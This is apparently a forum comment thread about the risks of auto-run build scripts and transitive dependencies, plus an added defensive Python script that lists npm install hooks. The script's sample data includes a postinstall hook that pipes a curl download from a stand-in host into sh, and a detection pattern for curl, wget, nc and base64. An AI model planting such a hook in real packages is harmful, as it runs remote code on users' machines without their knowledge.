by jasonpeacock 1189 days ago
Nothing new to see here...

Any of these steps could do the same to your system, and it's been the "standard" for 30+ years:

    ./configure
    make
    sudo make install
Or literally any other language/package manager that supports build scripts.

At least you had to unpack the source archive and install the dependencies yourself, which gave one time to appreciate just how much you depended on and how trusting you were. Nowadays the bad code can be in any one of your 300 auto-downloaded public unsigned dependencies. It feels light, easy and fun but it's actually powerful dark magic to summon the work of thousands of individuals into your pet project.
A makefile can run arbitrary shell commands.
Sure. And the code you're compiling will also at some point be executed. So you're trusting the persons who wrote _that_ project. Also, if a Makefile looks like it's doing anything other than setting up the compile env and building you can be sure I'm interrupting it quickly to look at what it's doing.

OTOH a declarative build manifest with transitive dependencies is like a self-replicating invite to an open house party inside your computer. It's only a matter of time before some _bad people show up_. (cue Beastie Boys' "Fight For Your Right to Party")
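As an added example (not from any commenter in this thread), here is a small audit script that walks an npm-style dependency tree and lists every lifecycle script the package manager would run automatically at install time, flagging the ones worth reading before they run. The package names and the `node_modules` layout it builds are constructed sample data, not real packages.

```python
import json
import os
import re
import tempfile

# Lifecycle hooks that npm/yarn/pnpm execute on their own during install.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Shell fragments that mean "read this hook before letting it run":
# network fetches, piping into a shell, encoded blobs, eval.
SUSPICIOUS = re.compile(r"\b(curl|wget|nc)\b|\|\s*(ba)?sh\b|base64|\beval\b")


def find_install_hooks(root):
    """Return one record per auto-run lifecycle script found under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                manifest = json.load(fh)
            except json.JSONDecodeError:
                continue  # malformed manifest: skip rather than crash the audit
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE_HOOKS:
            if hook in scripts:
                cmd = scripts[hook]
                findings.append({
                    "package": manifest.get("name", os.path.relpath(dirpath, root)),
                    "hook": hook,
                    "command": cmd,
                    "suspicious": bool(SUSPICIOUS.search(cmd)),
                })
    return findings


def build_sample_tree():
    """Constructed sample tree: three hypothetical packages, one with a risky hook."""
    root = tempfile.mkdtemp()
    samples = {
        "left-pad-ish": {"name": "left-pad-ish", "scripts": {"test": "mocha"}},
        "native-thing": {"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}},
        "helper-lib": {"name": "helper-lib",
                       "scripts": {"postinstall": "curl -s http://example.invalid/setup.sh | sh"}},
    }
    for pkg, manifest in samples.items():
        pkg_dir = os.path.join(root, "node_modules", pkg)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    for f in find_install_hooks(build_sample_tree()):
        flag = "REVIEW" if f["suspicious"] else "ok"
        print(f"[{flag}] {f['package']}: {f['hook']} -> {f['command']}")
```

Point it at a real project's `node_modules` to get the list of install-time commands that a plain `npm install` would have run without showing you.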